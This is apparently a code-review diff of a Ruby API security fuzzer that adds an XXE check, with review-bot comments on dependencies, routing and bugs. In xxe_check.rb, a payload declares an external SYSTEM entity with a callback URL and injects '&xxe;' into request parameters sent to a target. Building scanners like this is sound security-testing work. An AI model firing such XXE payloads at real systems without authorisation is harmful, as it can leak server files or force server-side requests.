8 files changed: +61 −0 lines changed
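--- a/API_Fuzzer.gemspec
+++ b/API_Fuzzer.gemspec
@@ -28,6 +28,7 @@ Gem::Specification.new do |spec|
 spec . require_paths = [ "lib" ]
 
 spec . add_dependency 'http' , '~> 2.0'
+spec . add_dependency 'activesupport'
 spec . add_development_dependency "bundler" , "~> 1.12"
 spec . add_development_dependency "rake" , "~> 10.0"
 spec . add_development_dependency "minitest" , "~> 5.0"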
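Review bot: `spec.add_dependency 'activesupport'` is added without a version constraint, unlike the pinned `'http', '~> 2.0'` on the line above, and it is not the gem the new code actually needs: lib/API_Fuzzer/engine.rb subclasses `::Rails::Engine`, which is provided by railties, not by activesupport, and lib/API_Fuzzer.rb now requires that engine file unconditionally. As written the gem installs but raises NameError on `Rails` wherever it is loaded outside a Rails process, while nothing in this commit appears to use activesupport itself. Either declare the real dependency with a constraint (`spec.add_dependency 'railties', '~> X.Y'` — placeholder range, match what the engine was tested against) or guard the engine require with `defined?(Rails)`.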
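--- a/Gemfile
+++ b/Gemfile
@@ -3,6 +3,7 @@ source 'https://rubygems.org'
 # Specify your gem's dependencies in API_Fuzzer.gemspec
 
 gem 'http'
+gem 'builder'
 
 group :development do
 gem 'byebug'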
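Review bot: `gem 'builder'` is added to the Gemfile although the comment two lines up says dependencies belong in API_Fuzzer.gemspec, and nothing else in this commit references Builder, so it is unclear whether this is a runtime dependency that gem consumers will silently miss or a leftover from local experimentation. If the XXE payload is meant to be generated with Builder instead of the heredoc in XxeCheck, move it to the gemspec with a version constraint; otherwise drop the line.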
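--- /dev/null
+++ b/UNKNOWN_PATH/ping_controller.rb
@@ -0,0 +1,13 @@
+class PingController < ActionController ::Base
+def index
+sha = params [ :id ]
+scan = Scan . find_by_sid ( sha )
+scan . vulnerabilities . create! (
+status : 'HIGH' ,
+class_type : 'Vulnerability' ,
+description : 'Possible XXE vulnerability in #{scan.url}' ,
+value : params [ :body ]
+) if scan
+render :ok
+end
+end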
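Review bot: The description on line 8 is single-quoted, so `#{scan.url}` is stored literally and the recorded vulnerability never names the scanned URL; it needs double quotes: `description: "Possible XXE vulnerability in #{scan.url}",`. `render :ok` on line 11 most likely asks Rails to render a template named `ok` for this controller, which does not exist, so the callback would raise a missing-template error after the record has already been created; `head :ok` is the intended call. `params[:body]` is also written straight into `value` with no length limit, so one callback can persist an arbitrarily large body — truncate it, or store only the fact that the callback arrived. `Scan.find_by_sid` and the `vulnerabilities` association are defined outside this commit, so whether `create!` can raise validation errors here cannot be checked from the diff.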
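--- /dev/null
+++ b/UNKNOWN_PATH/routes.rb
@@ -0,0 +1,3 @@
+API_Fuzzer ::Engine . routes . draw do
+get '/ping/:id' => 'ping#index'
+end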
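--- a/lib/API_Fuzzer.rb
+++ b/lib/API_Fuzzer.rb
@@ -5,6 +5,7 @@
 require 'API_Fuzzer/sql_blind_check'
 require 'API_Fuzzer/xss_check'
 require 'API_Fuzzer/request'
+require 'API_Fuzzer/engine'
 
 module API_Fuzzer
 # Scans all the checks
@@ -16,6 +17,7 @@ def self.scan(options = {})
 vulnerabilities << API_Fuzzer ::XssCheck . scan ( options )
 vulnerabilities << API_Fuzzer ::SqlCheck . scan ( options )
 vulnerabilities << API_Fuzzer ::SqlBlindCheck . scan ( options )
+API_Fuzzer ::XxeCheck . scan ( options )
 vulnerabilities . uniq . flatten
 end
 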
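Review bot: `API_Fuzzer::XxeCheck.scan(options)` on new line 20 references a constant this file never loads — the only require added to the header is `require 'API_Fuzzer/engine'`, with no `require 'API_Fuzzer/xxe_check'` beside the sibling `sql_blind_check`/`xss_check` requires — so unless the engine autoloads it, `scan` raises NameError. The XXE result is also the only one not appended to `vulnerabilities`, which is presumably deliberate because the check reports out of band through PingController rather than returning findings; that deserves a comment on the call, e.g. `# XXE is detected out of band via the /ping/:id callback; nothing to collect here`. `scan` begins above the hunk, so the rest of its body is not visible.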
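--- /dev/null
+++ b/lib/API_Fuzzer/engine.rb
@@ -0,0 +1,3 @@
+module API_Fuzzer
+class Engine < ::Rails ::Engine ; end
+end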
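--- a/lib/API_Fuzzer/request.rb
+++ b/lib/API_Fuzzer/request.rb
@@ -10,6 +10,7 @@ def send_api_request(options = {})
 @params = options . delete ( :params ) || { }
 @method = options . delete ( :method ) || :get
 @json = options . delete ( :json ) ? true : false
+@body = options . delete ( :body ) ? true : false
 @request = set_cookies ( options )
 send_request
 end
@@ -56,6 +57,8 @@ def self.set_params
 { 'json' => @params }
 elsif method_get?
 { 'params' => @params }
+elsif @body
+{ 'body' => @params }
 else
 { 'form' => @params }
 end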
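Review bot: The new `elsif @body` branch in `set_params` sits after the `method_get?` branch, so a caller that passes `body: true` but leaves `method` at its `:get` default silently has the raw payload sent as query parameters instead of as the request body, and `json: true` wins over `body: true` the same way. Moving `elsif @body` ahead of `elsif method_get?` (or raising when both are set) makes the option mean what it says; at minimum document the precedence on the assignment: `# :body is honoured only for non-GET, non-JSON requests`. The `? true : false` on new line 13 is just `!!options.delete(:body)` — a style nit that mirrors the line above. Both `send_api_request` and `set_params` start outside the hunk.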
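--- /dev/null
+++ b/UNKNOWN_PATH/xxe_check.rb
@@ -0,0 +1,35 @@
+require 'API_Fuzzer/vulnerability'
+require 'API_Fuzzer/error'
+require 'API_Fuzzer/request'
+require 'byebug'
+
+module API_Fuzzer
+class XxeCheck
+
+def self . scan ( options = { } )
+@url = options [ :url ] || nil
+@params = options [ :params ] || ''
+@scan_hash = options [ :scan ]
+fuzz_xml_params
+end
+
+def self . fuzz_xml_params
+return unless @params
+body = @params . gsub ( /\> \s *[a-zA-Z0-9]*\s *\< \/ / , '>&xxe;<' )
+payload = <<-XXEPAYLOAD
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY xxe SYSTEM "http://127.0.0.1:3000/yoxxe" >]>
+XXEPAYLOAD
+payload << body
+
+API_Fuzzer ::Request . send_api_request (
+url : @url ,
+params : payload ,
+body : true ,
+method : :post
+)
+end
+end
+end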
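Review bot: `require 'byebug'` on line 4 loads a debugger from library code; byebug is only in the Gemfile's `:development` group, so any consumer that installs the gem without it gets a LoadError the moment this file is required — delete the line. The DOCTYPE's entity URL `http://127.0.0.1:3000/yoxxe` is hard-coded to a loopback address (the target's own, not the fuzzer's) and to a path the engine never routes (the registered callback is `/ping/:id`), and `@scan_hash` is assigned but never used, so even when a target resolves the entity the callback cannot reach PingController or be correlated with a scan; the callback base and path need to come from configuration and carry the scan id, otherwise this check can never report anything. `return unless @params` on line 17 is dead because `scan` already defaulted `@params` to `''`; `return if @params.empty?` is the guard that was meant. Keeping `@url`/`@params` on the class object also means concurrent scans overwrite each other's state, though that appears to match how the sibling checks work and is outside this commit.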